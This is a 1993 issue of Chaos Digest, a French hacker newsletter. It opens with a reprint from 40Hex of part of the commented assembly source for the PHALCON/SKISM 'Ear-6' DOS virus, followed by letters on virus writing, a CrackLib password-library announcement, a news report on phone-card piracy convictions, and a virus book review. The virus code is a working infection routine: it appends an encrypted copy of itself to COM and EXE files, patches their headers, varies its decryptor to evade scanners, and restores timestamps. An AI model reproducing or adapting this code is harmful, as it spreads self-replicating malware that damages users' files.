Copy Link
Add to Bookmark
Report
Chaos Digest Volume 01 Numero 71
Chaos Digest Dimanche 4 Juillet 1993 Volume 1 : Numero 71
ISSN 1244-4901
Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere
TABLE DES MATIERES, #1.71 (4 Juillet 1993)
File 1--40H VMag Number 8 Volume 2 Issue 4 #009(2)-010 (reprint)
File 2--Bien choisir son mot de passe (produit)
File 3--171892 FF depense sur une telecarte de 150 unites (communique)
File 4--"Computer Virus Desk Reference" de Chris Feudo (critique)
Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST
The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.
Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:
* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.
----------------------------------------------------------------------
Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #009(2)-010 (reprint)
cmp word ptr [bp+buffer], 'ZM' ;?Es EXE o COM?
jz buscaEXE
buscaCOM:
mov ax, word ptr [bp+f_long] ;?Cuan grande es la ficha?
sub ax, longitud_del_virus + 3 ;Adjusta para el JMP
cmp ax, word ptr [bp+buffer+1] ;?Ya es infectada?
jnz infecta_mi_burro ;"infect my ass"
jmp short BuscaMas
buscaEXE:
cmp word ptr [bp+buffer+10h], id
jnz infecta_mi_burro
BuscaMas:
mov ah, 4fh ;Busca otra ficha...
jmp short brb_brb
hasta_la_vista_bebe: ;?Le gusta Arnold?
ret
infecta_mi_burro:
;AX = longitud de la ficha infectada
lea si, [bp+buffer]
cmp word ptr [si], 'ZM'
jz InfectaEXE
InfectaCOM:
push ax
mov cx, word ptr [bp+tempo]
mov word ptr [bp+remendar1+1], cx
lea di, [bp+Primer3]
movsb
push si
movsw
mov byte ptr [bp+buffer], 0e9h
pop di
add ax, longitud_del_virus
stosw
mov cx, 3
jmp short TerminaInfeccion
InfectaEXE:
les ax, [si+14h] ;Salva el original empieza
mov word ptr [bp+EXE_Donde_JMP2], ax;CS:IP de la ficha infectada
mov word ptr [bp+EXE_Donde_JMP2+2], es
les ax, [si+0Eh] ;Salva la original locacion
mov word ptr [bp+PilaOriginal2], es ;de la pila
mov word ptr [bp+PilaOriginal2+2], ax
mov ax, word ptr [si + 8]
mov cl, 4
shl ax, cl
xchg ax, bx
les ax, [bp+offset nuevoDTA+26]
mov dx, es
push ax
push dx
sub ax, bx
sbb dx, 0
mov cx, 10h
div cx
mov word ptr [si+14h], dx ;Nuevo empieza CS:IP
mov word ptr [si+16h], ax
mov cl, 4
shr dx, cl
add ax, dx
mov word ptr [si+0Eh], ax ;y SS:SP
mov word ptr [si+10h], id
pop dx ;Restaura el magnitud de
pop ax ;la ficha
add ax, longitud_del_virus ;Anada el magnitud del virus
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1
mov word ptr [si+4], dx ;Nuevo magnitud de la ficha
mov word ptr [si+2], ax
push cs
pop es
mov ax, word ptr [si+14h]
sub ax, longitud_del_virus + offset Empezarvir
push ax
mov cx, 1ah
TerminaInfeccion:
mov al, 2
call abrir
mov ah, 40h
lea dx, [bp+buffer]
int 21h
mov ax, 4202h
xor cx, cx
cwd ;xor dx,dx
int 21h
mov ah, 2ch ;Numeros azados en CX y DX
int 21h
mov word ptr [bp+remendar3+2], cx ;Es el nuevo numero de la
;cifra
and cx, 31 ;Pone un numero azado para el
add cx, ((longitud_del_virus + 1) / 2);magnitud de la ficha. Por
;eso, los scanners necesitan
mov word ptr [bp+remendar2+1], cx ;usar "wildcards"
lea di, [bp+tempstore]
mov al, 53h ;push bx
stosb ;(no destruir el mango de la
; ficha)
lea si, [bp+shwing] ;Copia las instrucciones
push si ;para formar la cifra
mov cx, longitud_de_la_cifra
push cx
rep movsb
mov al, 5bh ;pop bx
stosb ;(recuerda mango de la ficha)
lea si, [bp+escribir] ;Copia las instrucciones
mov cx, longitud_del_escribir ;para anada el virus a la
rep movsb ;ficha
mov al, 53h ;push bx
stosb
pop cx ;Copia las instrucciones
pop si ;para invalidar la cifra
rep movsb
mov ax, 0c35bh ;pop bx, retn
stosw
pop ax
;Codo del comienzo de la cifra
add ax, offset EmpezarCifra + longitud_del_virus
mov word ptr [bp+remendar1+1], ax
call antes_del_tempstore
mov ax, 5701h ;BX = mango de la ficha
mov dx, word ptr [bp+f_fecha]
mov cx, word ptr [bp+f_hora]
int 21h ;Restaura fecha y hora
mov ah, 3eh
int 21h
xor ch, ch
mov cl, byte ptr [bp+f_atrib]
mov ax, 4301h
lea dx, [bp+offset nuevoDTA + 30] ;Busca un ficha en el DTA
int 21h
inc byte ptr [bp+numinf]
jmp BuscaMas
Primer3 db 0CDh, 20h, 0
puntos db '..',0
mascara1 db '*.EXE',0
mascara2 db '*.COM',0
abrir: mov ah, 3dh ;Abrir un ficha
lea dx, [bp+nuevoDTA+30] ;Nombre de la ficha es en
int 21h ;el DTA
xchg ax, bx
ret
indice dw offset oreja1, offset oreja2, offset oreja3, offset oreja4
dw offset oreja5, offset oreja6, offset oreja4, offset oreja1
oreja1 db '1','Auditory Canal$'
oreja2 db '1','Lobe$'
oreja3 db '2','Anvil$'
oreja4 db '2','Eustachian Tube$'
oreja5 db '3','Auditory Nerve$'
oreja6 db '3','Cochlea$'
mensaje db 'PHALCON/SKISM 1992 [Ear-6] Alert!',13,10,'Where is the $'
secciones db ' located?',13,10
db ' 1. External Ear',13,10
db ' 2. Middle Ear',13,10
db ' 3. Inner Ear',13,10,'( )',8,8,'$'
;No es bueno.
suspendido db 13,10,'You obviously know nothing about ears.'
db 13,10,'Try again after some study.',13,10,'$'
;!Espero que si!
aprueba db 13,10,'Wow, you know your ears! Please resume work.',13,10
db '$'
escribir:
mov ah, 40h
mov cx, TerminaVir - EmpezarVir
lea dx, [bp+EmpezarVir]
int 21h
termina_escribir:
backslash db '\'
TerminaVir = $
;Los que sigue son en el monton...
longitud_de_la_cifra = offset EmpezarCifra - offset shwing
diroriginal db 64 dup (?)
tempo dw ?
nuevoDTA db 43 dup (?)
numinf db ?
antes_del_tempstore:
;tempstore es el buffer para el parte del programa que anada el virus al fin
;de otro programa
tempstore db (longitud_de_la_cifra*2+longitud_del_escribir+5) dup (?)
;anada cinco para los pop,
;los push, y el retn
buffer db 1ah dup (?)
f_atrib db ? ;atributo de la ficha
f_hora dw ? ;hora de creacion
f_fecha dw ? ;fecha de creacion
f_long dd ? ;magnitud de la ficha
end Empezar
+++++
40Hex Number 8 Volume 2 Issue 4 File 010
Letters to the editor! Well, as you can imagine when I got this
message I was quite startled. Sorry Paul, no top billing this time :-).
Although it is at this point, that I would like to say a couple things.
For instance, the virus community seems to think that their actions go
unnoticed. As you might imagine, this is not quite true. C'mon,
security people get their hands on 40Hex shortly after our boards get
it. Just letting you know that big brother is watching :).
----------------------------------------------------------------------------
40-Hex Response:
As a Security Analyst I find 40-Hex an incredibly interesting magazine.
The magazine presents entirely different viewpoints then what is in the
industry magazines such as Virus Bulletin, Virus News International and
Virus News and Reviews. Although all three of these publications are good
and very useful to me in my job, 40-Hex does indeed keep my mind open. It
discusses viruses in depth, including commented source code, and has been a
real learning tool for me. There is just not anywhere that you can get the
detailed analysis of a virus except in a magazine like 40-Hex. I can't help
but be torn between my thirst for knowledge about virii and how they work,
and the fear that the more knowledge about virus writing becomes available to
the public, the greater chance that there is going to be more and more garbage
out there and more and more irresponsible people releasing this garbage on
their "friends and neighbors".
I do want to thank 40-Hex for what I consider a very favorable review. I
had to laugh about the comments, because frankly I agreed with them. I guess
that I do get a little melodramatic sometimes. But I do honestly believe
that the knowledge exists out there to create a program/virus that will
be able to escape detection by any method in use today. Whether it will
ever be written and whether it will have destructive capabilities I don't
really know. I don't know of any virus writers that make profits off
their work. While all the anti-virus developers, although they complain
about the work that they have to do to keep up with the virus writers,
certainly make a nice profit on something like a Michelangelo scare. So
the only motivation for the virus writer is the challenge of creating a
nearly undetectable virus.
I am very curious myself to see if the NCSA's prediction of 40,000 virii
by 1994 comes true. I certainly agree with 40-Hex that most of
these virii will be hacks of some of the existing code out there now. The
anti-virus industry itself can't decide on how to count different strains of
viruses, so anyone will be able to make whatever claim they want anyway.
Finally, Dr. Solomon said it best informally at the First International
Virus Prevention Conference. He was talking about how America was founded
on freedom and the rights of the individual. He said that Americans seem
far too willing, in his opinion, to voluntarily give up those rights. Right
now, virus writing is not illegal. And hopefully it never will be, because
what you or I do with our own personal computers is no one else's business
but our own. But when we interfer with someone else's computer or data or
life, that I believe that is where the line is drawn. Its going to be a
very long and hard process to determine responsibility for damages caused by
a virus. Passing a law to make virus writing itself illegal will not solve
the problem. Something, though, has to be done to protect an individual's
or a corporation's rights to have a virus-free working environment. There
are enough problems with buggy commercial software, without having to worry
about virii hitting your computers too. But until that time comes part of
my job will continue to be warning people about the dangers of viruses and
helping them protect their data.
Paul Melka
Response to a Response to a Response:
+------------------------------------
As the head of the -=PHALCON/SKISM=-, I find your letter a very
interesting response. I thank you for your raving reviews on 40Hex. We
try to make it a magazine that everyone can learn from. Well, I still
debate the undetectable virus issue. Regarding the virus writer/anti-virus
issue, I definately agree, that the anti-virus people are motivated by greed
more then anything else. I am glad to see that you agreed with my oh so
witty comments, they weren't meant to be abusive, just a little comic relief.
I agree with you on the issues regarding a virus-free working
environment. But, as you already know, writing a virus isn't
illegal, it is the spreading that is illegal. Unfortunately, it is too
late to start working on anti-virus writing legislation now. The damage
has been done. The virus issue is fairly similiar to the AIDS issue.
You have to use protection, no matter what. There will never be an end
to virii. Even if everyone stopped writing virii, the infection rate
wouldn't decrease. I don't know of many people that get hit by the
newer strains that have been coming out. Most people still get hit by
Jerusalem, Stoned, and other 'classics'.
I would be very interested in what solutions you may have come up with
to protect the rights of individuals and corporations. I hadn't heard about
Dr. Solomon's comments, until I recieved your letter. Quite frankly, I agree
with what he is saying. Another major problem with making virus writing
illegal is the definition of a virus, or trojan for that matter. It is
very difficult to come up with a concrete definition.
I appreciate your response, and definately encourage other people, either
pro- or anti- virus to respond!
-)GHeap
------------------------------
Date: 18 Jun 1993 13:01:15 GMT
From: alecm@uk-usenet.uk.sun.com (Alec Muffett - Sun IS - System Admin )
Subject: File 2--Bien choisir son mot de passe (produit)
CrackLib is a library containing a C function (well, lots of functions
really, but you only need to use one of them) which may be used in a
"passwd"-like program.
The idea is simple: try to prevent users from choosing passwords that
could be guessed by "Crack" by filtering them out, at source.
CrackLib is an offshoot of the version 5 "Crack" software, and contains
a considerable number of ideas nicked from the new software. At the time
of writing, Crack 5 is incomplete (still awaiting purchase of my home box)
but I though I could share this with you.
NOTE THIS WELL: CrackLib is NOT a replacement "passwd" programm.
CrackLib is a LIBRARY. CrackLib is what trendy marketdroid types would
probably call an "enabler".
The idea is that you wire it into your _own_ "passwd" program (if you
have source); alternatively, you wire it into something like "shadow"
from off of the net. You can use it almost _everywhere_.
FOR YOUR INFORMATION
CrackLib has been tested mostly on Suns. If you can point me at ways
round portability problems (eg: static linking, other libraries, etc)
I'd be most grateful.
A reference copy of CrackLib (+ large dictionary) can be found via
anonymous FTP at:
black.ox.ac.uk: ~ftp/src/security/cracklib25.tar.Z
[ChaosD: Nous avons demande l'avis de plusieurs specialistes sur Crack
v4.1f et UFC-crypt. En voici un:]
Date: Mon, 21 Jun 1993 15:54:07 +0100
From: pcl@ox.ac.uk (Paul Leyland )
I don't know that I am the ideal person to write anything much about
Crack and/or UFC. I suggest that you contact their authors
Alec.Muffett@sun-microsystems.co.uk and glad@daimi.aau.dk.
For my part, I have used Crack to test the passwords used by a number
of Oxford systems. I found around 150 passwords before I lost
interest; it took me about 3 weeks cpu time on a DEC5500 to get that
lot. Some systems were much more secure than others: one had almost
25% of its password discovered; another had only 1 out of over 300.
I have not used Crack for over a year, now that we have moved over to
a shadow password scheme.
I have also collected a few dictionaries together, and made them
available by anon-ftp from black.ox.ac.uk. More recently (Friday!) Alec
Muffett's cracklib has been released and made available on black.
As for UFC, I managed to deduce how DEC's crypt16() library routine
works and then made a few trivial changes to Michael Glad's code to
produce a ufc-crypt16. I can't take much credit for anything else
and, to be quite honest, do not really know how Glad code works.
------------------------------
Date: Sun Jul 4 10:55:00 1993
From: david.michelson@his.com (David Michelson )
Subject: File 3--171892 F depense sur une telecarte de 150 unites (communique)
Copyright: Agence France Presse, 1993
Justice France - France Telecom demande plus d'un million de dommages
a des pirates de telecartes - TOULOUSE, 1er juin 93 (250 MOTS)
France Telecom a demande mardi plus d'un million de francs de dommages
a douze "pirates" de cartes a puces telephoniques, qui ont comparu mardi
devant le Tribunal Correctionnel de Toulouse.
Le Parquet, de son cote, a requis une peine de quatre mois de prison avec
sursis a l'encontre du principal inventeur d'un dispositif qui permettait de
recharger a l'infini les puces des cartes telephoniques usagees.
Denis Hory, 26 ans, etait "un petit genie de l'electronique", selon ses
camarades d'une grande ecole de genie electrique de Toulouse, ou il etudiait
en 1989, au moment des faits. Il avait mis au point un systeme simple lui
permettant de renover les cartes a puce grace a un interrupteur et une pile
electrique.
Devant le succes de son invention, il l'avait commercialisee a petite
echelle, notamment aupres de camarades Polynesiens et des Caraibes qui
desiraient parler a leurs familles a peu de frais. France Telecom lui demande
600.000 francs de dommages.
Le centre de gestion des cartes de France Telecom a localise les
anomalies d'utilisation et alerte, en aout 1990, la gendarmerie qui a pu
remonter la filiere.
Selon France Telecom,le prejudice est "difficile a fixer avec precision",
et les enqueteurs n'ont pu trouver que deux Telecartes utilisees. Mais l'une
d'entre-elles avait totalise 214.865 unites (171.892 francs) pour une duree
theorique de 150 (100 francs).
Le jugement a ete mis en delibere au 8 Juin.
mgl/da
+++++
Justice Telecom - Des pirates de telecartes condamnes a verser 300.000
francs de dommages a France Telecom - TOULOUSE, 23 juin 93 (250 MOTS)
Sept "pirates" de cartes a puce telephoniques ont ete condamnes,mercredi,
par le tribunal correctionnel de Toulouse a verser solidairement 300000 francs
de dommages a France Telecom, ainsi qu'a des peines d'emprisonnement allant
d'un an dont onze mois avec sursis a deux mois avec sursis.
[...] A l'audience, France Telecom avait demande plus d'un million de
francs de dommages, se basant sur l'une des deux cartes retrouvees par les
enqueteurs [...].
Estimant le montant des dommages trop eleve, l'un des avocats de la
defense a annonce mercredi qu'il comptait faire appel du jugement.
nd/da
------------------------------
Date: Fri Jun 25 13:47:00 -0600 1993
From: roberts@decus.arc.ab.ca ("Rob Slade, DECrypt Editor )
Subject: File 4--"Computer Virus Desk Reference" de Chris Feudo (critique)
Copyright: Robert M. Slade, 1993
Business One Irwin
Homewood, IL 60430
Chris Feudo - xi685c@gwuvm.gwu.edu
The Computer Virus Desk Reference, 1992
I must make one thing perfectly plain from the start, here. You are going
to have to determine for yourself whether I am biased in favour of this book
because it reprints a fair amount of my own writing, or whether I am biased
against the book because I am not being paid for any of it.
The title is definitely correct. This is far too large a tome to be a handbook
or a "quick" reference. Of the 556 pages in the book, more than 400 come from
other sources. Patty Hoffman has contributed about 250 in the form of three
sections from the Virus Summary list;Chris McDonald and myself are represented
by about 50 pages of antiviral software reviews each. Jim Wright's list of
antiviral archive sites is included, as is a copy of the "Dirty Dozen" list
of "malware" sightings.
The structure of the work is as a small "book" with a lot of large appendices.
The "book" part, unfortunately, is somewhat confused. On the one hand there
are items which, if they are not perhaps in outright error, definitely mislead
the naive reader. For example, the definitions at the beginning of the book
tell us that a trojan horse "can easily implant itself in any normal program".
The absolute distinction between a trojan horse and a viral program may not
always be clear. A program infected with a virus may be seen as a type of
trojan horse since it carries an undesired "payload". However, most
researchers would agree that a trojan horse is the combination of carrier and
payload, and that the distinction between a trojan and a virus is that the
trojan does *not* have the ability to "implant itself" in another program.
Reproduction is the domain of the viral program.
Feudo also makes reference, on page 34, to "replacement" viral programs.
These he describes as programs which "recode" (and, presumably, recompile)
other programs to include themselves. While this kind of activity is
occasionally discussed by the research community, no such viral programs have
ever been seen. The closest is "p1" in the fictional work "The Adolescence
of P1" by Thomas J. Ryan.
It is difficult to see why other parts of the book, while interesting, are
included in a computer virus reference. For example, there are three pages
dedicated to the technology and vendors of wireless LANs. While the network
spread of viral programs is a concern, there is no distinction at all between
wired or wireless LANs in this regard.
The structure of the book overall is somewhat undisciplined. Chapter 2,
entitled "Viral Attacks", turns very quickly into an extremely technical
overview of the disk and program structure of MS-DOS computers. It then goes
on to give case studies of a number of "case studies" of Mac specific viral
programs. Two of these are repeated in chapter 4, "Viral Program Analysis",
in which most of the MS-DOS case studies are done.
As previously mentioned, most of the "contributed" material is in appendices.
This is not, however,the case with the bulk of the Hoffman Virus Summary List,
which is chapter 5 of the book itself. (Interestingly, although the VTC/CARO
Computer Virus Catalog is mentioned in the Acknowledgments, it is *not*
reproduced in the book at all.)
The contributed reference material may be very helpful to those who have no
access to computer network archives and sources. However, it should be noted
that much of this is very "dated". Although the book has a copyright date of
1992, and I received a copy early in 1993, the Hoffman Summary List is dated
August of 1991. If I recall correctly, the last of the reviews I sent to
Chris Feudo were slightly before that. The contact info listed for me is
even older: so old that all of the email addresses listed were invalid by
the summer of 1991.
Aside from the dating of the material,there is much here that is not available
in other printed works, or to those who do not have net access. However, this
is primarily a reference work, and should be supplemented by more accurate
conceptual material on viral operations and prevention. This is particularly
true for beginning computer users, since much of the work is either highly
technical, or requires additional background material as an aid to
understanding.
==============
Vancouver ROBERTS@decus.ca | "It says 'Hit any
Institute for Robert_Slade@sfu.ca | key to continue.'
Research into rslade@cue.bc.ca | I can't find the
User p1@CyberStore.ca | 'Any' key on my
Security Canada V7K 2G6 | keyboard."
------------------------------
End of Chaos Digest #1.71
************************************
